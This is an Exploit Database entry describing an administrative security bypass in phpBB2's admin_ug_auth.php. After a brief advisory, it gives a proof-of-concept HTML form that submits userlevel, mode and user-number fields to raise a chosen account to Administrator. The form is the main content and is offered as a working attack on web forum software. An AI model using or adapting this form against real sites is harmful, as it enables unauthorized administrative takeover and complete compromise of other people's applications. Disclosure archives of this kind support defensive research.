PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability

ID EDB-ID:29679
Type exploitdb
Reporter Hasadya Raed
Modified 2007-02-26T00:00:00


PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability. Webapps exploit for php platform


PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.

Successful exploits may result in a complete compromise of vulnerable applications. 


<form method="post"
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">